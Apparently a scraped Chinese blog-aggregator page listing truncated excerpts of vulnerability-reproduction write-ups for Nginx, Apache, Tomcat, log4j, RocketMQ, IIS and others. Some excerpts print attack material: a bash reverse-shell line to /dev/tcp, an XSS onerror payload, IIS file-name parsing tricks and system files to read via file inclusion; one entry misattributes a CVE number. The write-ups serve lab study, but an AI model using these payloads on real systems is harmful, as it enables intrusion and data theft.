漏洞winrar

Nginx 解析漏洞复现

### Nginx 解析漏洞复现 Nginx解析漏洞复现 版本信息: * Nginx 1.x最新版 * PHP 7.x最新版 由此可知,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。 ``` docker-compose up -d docker-compose config ......
漏洞 Nginx

Apache HTTPD换行解析漏洞(CVE-2017-15715)

### Apache HTTPD 换行解析漏洞(CVE-2017-15715)【项目中遇到】 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页,其**2.4.0~2.4.29**版本中存在一个解析漏洞,在解析PHP时,**1.php\x0A将按照PHP后缀进行解 ......
漏洞 Apache 15715 HTTPD 2017

漏洞练习记录

前言:在此记录一些常见漏洞 # 暴力破解 ## 1 基于表单的暴力破解 指对没有设置验证码,一定时间内提交次数的登录框进行暴力破解 直接用burp suite在用户名和密码添加payload然后跑字典就行,最后观察结果长度判断是否跑出结果 ## 2 验证码绕过(验证码在前端) 我们通过尝试登陆,多次 ......
漏洞

漏洞发现-web应用之漏洞探针利用修复

原理分析 1.已知 CMS 如常见的 dedecms.discuz,wordpress 等源码结构,这种一般采用非框架类开发,但也有少部分采用的是框架类开发,针对此类源码程序的安全检测,我们要利用公开的漏洞进行测试,如不存在可采用白盒代码审计自行挖掘。(1.在漏洞平台如seebug、cnvd搜索关键 ......
漏洞 探针 web

漏洞发现-操作系统之漏洞探针利用修复

一.探针 1.goby忍者系统测试 2.nmap扫描 如果加上参数,就会调用script目录下的nse插件进行扫描 Nmap --script=vuln 默认nse插件 Nmap vulscan vulners 调用第三方库探针 加入拓展扫描模块 https://cnblogs.com/shwang ......
漏洞 探针 系统

CVE-2021-22204 GitLab RCE之exiftool代码执行漏洞深入分析(二)

上一篇CVE-2021-22205 GitLab RCE之未授权访问深入分析(一)复现分析了第一部分也就是携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的,接下来我将分析exiftool漏洞的原理和最后的触发利用。 希望读者能读有所得,从中收获到自己独特的见解。 ......
漏洞 exiftool 代码 GitLab 22204

Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)

### Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)【项目中遇到过】 **1. 背景简述** java是目前WEB开发中主流的编程语言,而Tomcat是当前流行的Java中间件服务器之一。 Ghostcat(幽灵猫)是由长亭科技安全研究员发现的存在于 Tomcat ......
漏洞 Aapache 文件 Tomcat 2020

ActiveMQ任意文件写入漏洞(CVE-2016-3088)

### ActiveMQ任意文件写入漏洞(CVE-2016-3088)【现实项目遇到过】 **1. 环境搭建** ```sh cd vulhub-master/activemq/CVE-2016-3088 docker-compose up -d docker-compose config #查看靶 ......
漏洞 ActiveMQ 文件 2016 3088

Nexpose v6.6.209 for Linux & Windows - 漏洞扫描

Nexpose v6.6.209 for Linux & Windows - 漏洞扫描 Rapid7 Vulnerability Management, Release Aug 02, 2023 请访问原文链接:,查看最新版。原创作品,转载请保留出处。 作者主页:[sysin.org](https: ......
漏洞扫描 漏洞 Nexpose Windows 6.209

CVE-2021-44228 Apache log4j2远程代码执行漏洞

漏洞复现 验证是否存在apache log4j2漏洞 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 反弹shell bash -i >& /dev/tcp/ip/port 0>&1 将此命令进行javarunti ......
漏洞 代码 Apache log4j2 44228

Confluence OGNL表达式注入命令执行漏洞(CVE-2022-26134)

# Confluence OGNL表达式注入命令执行漏洞(CVE-2022-26134) ## 简介 Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在野利用的代码执行漏洞,攻击者利用这个漏洞即可无需 ......
表达式 Confluence 漏洞 命令 26134

web渗透测试(14):文件上传漏洞

在本节中,我们将介绍如何使用文件上载功能来获取代码。 在Web应用程序(尤其是使用文件系统来确定应运行哪些代码的应用程序)中,如果您设法上传具有正确文件名的文件(通常取决于扩展名),则可以在服务器上执行代码。在本节中,我们将看到这些类型的攻击的基础知识。 首先,由于我们正在开发一个PHP应用程序,我 ......
漏洞 文件 web 14

HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞)

# HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞) @[TOC](目录标题) ### 漏洞概述 ### http.sys介绍 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务 ......
蓝屏 漏洞 代码 HTTP 2015

fastjson 1.2.80 漏洞浅析及利用payload

# 0x01 说明 在fastjson的1.2.80版本中可以通过将依赖加入到java.lang.Exception 期望类的子类中,绕过checkAuto。 # 0x02 简析 ``` { "@type":"java.lang.Exception", "@type":"org.codehaus.g ......
漏洞 fastjson payload 80

CentOS7/8 升级openssl版本至3.0.8 修补漏洞SWEET32

升级步骤 1.安装perl-CPAN模块yum install perl-IPC-Cmd2.下载openssl源代码wget --no-check-certificate https://www.openssl.org/source/openssl-3.0.8.tar.gz tar -zxvf op ......
漏洞 CentOS7 openssl 版本 CentOS

Apache RocketMQ 远程代码执行漏洞(CVE-2023-33246)

RocketMQ 5.1.0及以下版本,在一定条件下,存在远程命令执行风险。RocketMQ的NameServer、Broker、Controller等多个组件外网泄露,缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。 此外,攻击者可以通过伪造 Roc... ......
漏洞 RocketMQ 代码 Apache 33246

WEB漏洞—XXE&XML之利用检测绕过全解

一.基础概念 1.XML XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞, ......
漏洞 WEB XXE XML amp

文件上传漏洞

文件上传漏洞 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者 WebShell 等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。 文件上传漏洞本身就是一个危害巨大的漏洞,WebShel ......
漏洞 文件

本地文件包含漏洞利用注意事项

## 本地文件包含漏洞利用注意事项 1. 当怀疑某个URL中的参数有LFI漏洞时,可以用/etc/passwd, /var/log/auth.log, /var/log/apache2/access.log,等进行测试,如果已知靶机有其他服务,比如邮件,那么可能还需要测试/var/mail/用户名 ......
漏洞 注意事项 事项 文件

ueditor编辑器存储型XSS漏洞

挖洞经验|UEditor编辑器存储型XSS漏洞 - FreeBuf网络安全行业门户 1、介绍 2、测试 2.1 靶场搭建 2.2 测试 burp拦截,篡改设置payload %3Cp%3E1111111"><ImG sRc=1 OnErRoR=prompt(1)>%3Cbr%2F%3E%3C%2Fp ......
编辑器 漏洞 ueditor XSS

OpenSSH 资源管理错误漏洞(CVE-2021-28041)

# OpenSSH 资源管理错误漏洞(CVE-2021-28041) 漏洞描述: OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。 该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他 网络级 ......
漏洞 资源管理 错误 OpenSSH 资源

Apache RocketMQ 远程代码执行漏洞(CVE-2023-37582)

Apache RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。CVE-2023-37582 中,由于对 CVE-2023-33246 修复不完善,导致在Apache RocketMQ NameServer 存在未授权访问的情况下,攻击者可构造恶意请求以RocketMQ运行的系... ......
漏洞 RocketMQ 代码 Apache 37582

Apache Shrio反序列化漏洞

Apache Shiro是一个流行的Java安全框架,然而,它存在一个反序列化漏洞,即CVE-2017-5638。该漏洞允许攻击者通过构造恶意序列化数据,利用Shiro的序列化功能来执行任意代码,从而攻击Java应用程序的安全边界。 以下是Apache Shrio反序列化漏洞的介绍及复现过程: 漏洞 ......
序列 漏洞 Apache Shrio

log4j JNDI注入漏洞

log4j漏洞复现及详细分析 - FreeBuf网络安全行业门户 Vulhub - Docker-Compose file for vulnerability environment 1、介绍 名称:log4j JNDI注入漏洞 编号:CVE-2021-44228 原理: 应用:log4j 版本: ......
漏洞 log4j JNDI log4 log

Windows五次Shift漏洞

# Windows五次Shift漏洞 标签(空格分隔): 网络攻防技术 ###实验原理 当我们使用计算机时,连续按下5次shift键会弹出一个程序。该程序名称为“sethc.exe”,其路径为“c:\windows\system32\sethc.exe”。 原理 : 该系统漏洞由于部分Win7及Wi ......
漏洞 Windows Shift

Windows漏洞CVE-2019-0708

# Windows漏洞CVE-2019-0708 标签(空格分隔): 网络攻防技术 ###1.python-exp攻击 步骤 : (1)**开启Windows7的远程桌面服务**:在windows7系统中依次选择【控制面板】→【系统和安全】→【允许远程访问】打开远程访问服务。 (2)**下载漏洞利用 ......
漏洞 Windows 2019 0708 CVE

Golang漏洞管理

原文在[这里](https://go.dev/security/vuln/) ## 概述 Go帮助开发人员检测、评估和解决可能被攻击者利用的错误或弱点。在幕后,Go团队运行一个管道来整理关于漏洞的报告,这些报告存储在Go漏洞数据库中。各种库和工具可以读取和分析这些报告,以了解特定用户项目可能受到的影 ......
漏洞 Golang

log4j反序列化漏洞

Vulhub - Docker-Compose file for vulnerability environment 1、介绍 名称:nginx解析漏洞 编号: 原理: 应用:log4j 版本: 2、测试 2.1 靶场搭建 2.2 ysoserial: JAVA反序列化POC生成工具 (gitee. ......
序列 漏洞 log4j log4 log

Apache HTTPD 换行解析漏洞(CVE-2017-15715)

Vulhub - Docker-Compose file for vulnerability environment 1、介绍 名称:Apache HTTPD 换行解析漏洞 编号:CVE-2017-15715 原理:Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网 ......
漏洞 Apache 15715 HTTPD 2017

iis解析漏洞

1、介绍 名称:iis解析漏洞 编号: 原理:IIS 6.0 在处理含有特殊符号的文件路径时会出现逻辑错误,从而造成文件解析漏洞。这一漏洞有两种完全不同的利用方式: /test.asp/test.jpg test.asp;.jpg 应用:iis 版本: 2、测试 第一种是新建一个名为 "test.a ......
漏洞 iis